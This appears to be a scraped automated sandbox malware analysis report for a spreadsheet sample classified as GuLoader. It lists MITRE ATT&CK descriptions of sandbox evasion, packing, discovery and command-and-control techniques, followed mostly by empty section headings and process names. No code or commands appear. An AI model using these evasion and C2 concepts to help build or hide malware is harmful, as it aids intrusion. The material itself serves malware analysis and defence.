Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report ORDER.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 2024 Parent PID: 596

General

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2644 Parent PID: 596

Function 00419564, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 141
COMMON